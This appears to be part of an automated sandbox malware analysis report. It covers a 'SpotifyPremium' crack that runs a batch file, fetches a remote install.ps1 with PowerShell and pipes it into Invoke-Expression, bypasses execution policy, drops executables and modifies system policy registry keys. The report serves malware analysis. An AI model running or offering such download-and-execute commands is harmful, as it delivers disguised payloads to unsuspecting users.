description pid Process Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeShutdownPrivilege 5936 chrome.exe Token: SeCreatePagefilePrivilege 5936 chrome.exe Token: SeShutdownPrivilege 5936 chrome.exe Token: SeCreatePagefilePrivilege 5936 chrome.exe Token: SeShutdownPrivilege 5936 chrome.exe Token: SeCreatePagefilePrivilege 5936 chrome.exe Token: SeShutdownPrivilege 5936 chrome.exe Token: SeCreatePagefilePrivilege 5936 chrome.exe Token: SeShutdownPrivilege 5936 chrome.exe Token: SeCreatePagefilePrivilege 5936 chrome.exe Token: SeDebugPrivilege 3136 powershell.exe Token: SeIncreaseQuotaPrivilege 4844 WMIC.exe Token: SeSecurityPrivilege 4844 WMIC.exe Token: SeTakeOwnershipPrivilege 4844 WMIC.exe Token: SeLoadDriverPrivilege 4844 WMIC.exe Token: SeSystemProfilePrivilege 4844 WMIC.exe Token: SeSystemtimePrivilege 4844 WMIC.exe Token: SeProfSingleProcessPrivilege 4844 WMIC.exe Token: SeIncBasePriorityPrivilege 4844 WMIC.exe Token: SeCreatePagefilePrivilege 4844 WMIC.exe Token: SeBackupPrivilege 4844 WMIC.exe Token: SeRestorePrivilege 4844 WMIC.exe Token: SeShutdownPrivilege 4844 WMIC.exe Token: SeDebugPrivilege 4844 WMIC.exe Token: SeSystemEnvironmentPrivilege 4844 WMIC.exe Token: SeRemoteShutdownPrivilege 4844 WMIC.exe Token: SeUndockPrivilege 4844 WMIC.exe Token: SeManageVolumePrivilege 4844 WMIC.exe Token: 33 4844 WMIC.exe Token: 34 4844 WMIC.exe Token: 35 4844 WMIC.exe Token: 36 4844 WMIC.exe Token: SeIncreaseQuotaPrivilege 4844 WMIC.exe Token: SeSecurityPrivilege 4844 WMIC.exe Token: SeTakeOwnershipPrivilege 4844 WMIC.exe Token: SeLoadDriverPrivilege 4844 WMIC.exe Token: SeSystemProfilePrivilege 4844 WMIC.exe Token: SeSystemtimePrivilege 4844 WMIC.exe Token: SeProfSingleProcessPrivilege 4844 WMIC.exe Token: SeIncBasePriorityPrivilege 4844 WMIC.exe Token: SeCreatePagefilePrivilege 4844 WMIC.exe Token: SeBackupPrivilege 4844 WMIC.exe Token: SeRestorePrivilege 4844 WMIC.exe Token: SeShutdownPrivilege 4844 WMIC.exe Token: SeDebugPrivilege 4844 WMIC.exe Token: SeSystemEnvironmentPrivilege 4844 WMIC.exe Token: SeRemoteShutdownPrivilege 4844 WMIC.exe Token: SeUndockPrivilege 4844 WMIC.exe Token: SeManageVolumePrivilege 4844 WMIC.exe Token: 33 4844 WMIC.exe Token: 34 4844 WMIC.exe Token: 35 4844 WMIC.exe Token: 36 4844 WMIC.exe Token: SeIncreaseQuotaPrivilege 5700 WMIC.exe Token: SeSecurityPrivilege 5700 WMIC.exe Token: SeTakeOwnershipPrivilege 5700 WMIC.exe Token: SeLoadDriverPrivilege 5700 WMIC.exe Token: SeSystemProfilePrivilege 5700 WMIC.exe Token: SeSystemtimePrivilege 5700 WMIC.exe Token: SeProfSingleProcessPrivilege 5700 WMIC.exe Token: SeIncBasePriorityPrivilege 5700 WMIC.exe Token: SeCreatePagefilePrivilege 5700 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe -
Suspicious use of SetWindowsHookEx 25 IoCs
pid Process 4612 PcAppStore.exe 4612 PcAppStore.exe 4612 PcAppStore.exe 4612 PcAppStore.exe 5580 fast!.exe 7948 setup.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe 8500 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2680 wrote to memory of 3504 2680 msedge.exe 90 PID 2680 wrote to memory of 3504 2680 msedge.exe 90 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 2092 2680 msedge.exe 91 PID 2680 wrote to memory of 216 2680 msedge.exe 92 PID 2680 wrote to memory of 216 2680 msedge.exe 92 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 PID 2680 wrote to memory of 2016 2680 msedge.exe 93 -
System policy modification 1 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection msedge.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection msedgewebview2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID setup.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Nimetön2.png1⤵PID:3760
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x9c,0x128,0x7ff8bf1c46f8,0x7ff8bf1c4708,0x7ff8bf1c47182⤵PID:3504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:22⤵PID:2092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:82⤵PID:2016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:2476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:12⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:12⤵PID:1728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:12⤵PID:808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4220 /prefetch:12⤵PID:1324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:12⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:12⤵PID:1356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:12⤵PID:1116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:12⤵PID:4228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:12⤵PID:4664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3800 /prefetch:82⤵PID:1184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:12⤵PID:2572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:12⤵PID:1980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:12⤵PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:12⤵PID:1156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 /prefetch:82⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:12⤵PID:640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:12⤵PID:1452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:12⤵PID:4612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5500 /prefetch:82⤵PID:1084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵PID:1512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:12⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:12⤵PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:12⤵PID:2236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1972,14182546310680921609,1802912352200142307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:12⤵PID:1976
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3516
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4784
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\SpotifyPremium-main\SpotifyPremium-main\BlockTheSpot.bat" "1⤵PID:1728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& {Invoke-WebRequest -UseBasicParsing 'https://raw.githubusercontent.com/revinewyd/SpotifyPremium/main/install.ps1' | Invoke-Expression}"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Users\Admin\AppData\Local\Temp\BlockTheSpot-2024-12-04_14-02-03\SpotifyFullSetup.exe"C:\Users\Admin\AppData\Local\Temp\BlockTheSpot-2024-12-04_14-02-03\SpotifyFullSetup.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5280 -
C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exeSpotify.exe4⤵
- Executes dropped EXE
PID:2064
-
-
-
C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe"C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3816 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 9484⤵
- Program crash
PID:5252
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3816 -ip 38161⤵PID:5204
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\SpotifyPremium-main\SpotifyPremium-main\install.ps1"1⤵PID:5288
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\Downloads\SpotifyPremium-main\SpotifyPremium-main\install.ps1'"1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe"C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5596 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 9523⤵
- Program crash
PID:5676
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5596 -ip 55961⤵PID:5548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2664 -
